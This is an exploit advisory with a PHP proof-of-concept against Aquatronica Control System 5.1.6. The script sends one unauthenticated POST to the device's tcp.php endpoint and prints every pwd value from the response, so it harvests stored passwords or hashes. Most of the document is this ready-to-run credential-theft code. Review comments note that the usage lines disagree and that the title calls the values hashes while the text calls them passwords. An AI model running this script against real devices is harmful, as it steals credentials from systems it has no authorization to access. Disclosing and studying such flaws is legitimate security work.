=============================================================================================================================================
| # Title : Aquatronica Control System 5.1.6 Hash Disclosure Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits) |
| # Vendor : https://www.aquatronica.com |
=============================================================================================================================================

poc :

[+] Leak passwords in Aquatronica Control System v 5.1.6 has a tcp.php endpoint
[+] save as poc.php
[+] Usage : C:\www\test>php 3.php poc.php
[+] payload :

<?php
/*
 * Proof of concept for the disclosure described in the header: it sends one
 * POST to http://<argv[1]>/tcp.php and prints every value captured from a
 * pwd="..." attribute in an HTTP 200 response.
 *
 * The request body built below is form-encoded as
 * function_id=tcp_xml_request&command=WS_GET_NETWORK_CFG. The only cURL
 * options set are URL, POST, POSTFIELDS and RETURNTRANSFER: no credentials,
 * cookies or extra headers are attached, so a 200 response that carries pwd
 * attributes was returned to an unauthenticated caller.
 *
 * For log review, a POST to /tcp.php with that parameter pair is the request
 * this script produces.
 *
 * NOTE(review): the title says "Hash Disclosure" while the description and
 * the script call the values passwords. The page shows no sample response,
 * so whether the pwd values are hashes or cleartext cannot be confirmed here.
 * NOTE(review): the usage strings on this page disagree (3.php, poc.php,
 * aqua.php) and none shows the argument; the code requires exactly one
 * argument and uses it as the host part of the URL.
 * NOTE(review): the page names no fixed version or vendor advisory.
 */

// Make sure the required argument is present (script name plus one value).
if ($argc != 2) {
    echo "Usage: php aqua.php\n";
    exit(1);
}

// The single argument is interpolated into the URL below without validation.
$ip = $argv[1];
$program = "TCP";
$command = "ws_get_network_cfg";
$function_id = "TCP_XML_REQUEST";

// Build the URL of the tcp.php endpoint (the program name is lower-cased).
$url = "http://$ip/" . strtolower($program) . ".php";

// Data sent in the POST request: function_id is lower-cased and command is
// upper-cased before encoding.
$post_data = [
    'function_id' => strtolower($function_id),
    'command' => strtoupper($command)
];

// Send the request with cURL; RETURNTRANSFER makes curl_exec() return the
// body instead of printing it. The return value is not checked for false.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    // Undo URL encoding, then HTML special-character escaping.
    // NOTE(review): presumably the device returns its XML in that encoded
    // form; the page does not show a response to confirm it.
    $decoded_response = urldecode($response);
    $final_response = htmlspecialchars_decode($decoded_response);

    // Search for passwords with a regular expression: capture the non-empty
    // run of non-quote characters inside each pwd="..." attribute.
    preg_match_all('/pwd="([^"]+)"/', $final_response, $matches);

    if (!empty($matches[1])) {
        foreach ($matches[1] as $password) {
            echo " $password\n";
            sleep(1); // one-second delay between printed values
        }
    } else {
        echo "No passwords found.\n";
    }
} else {
    // Any status other than 200 lands here. The string literal below
    // contains a real line break, so its second line must stay at column 0.
    echo "Dry season! 
HTTP Code: $http_code\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================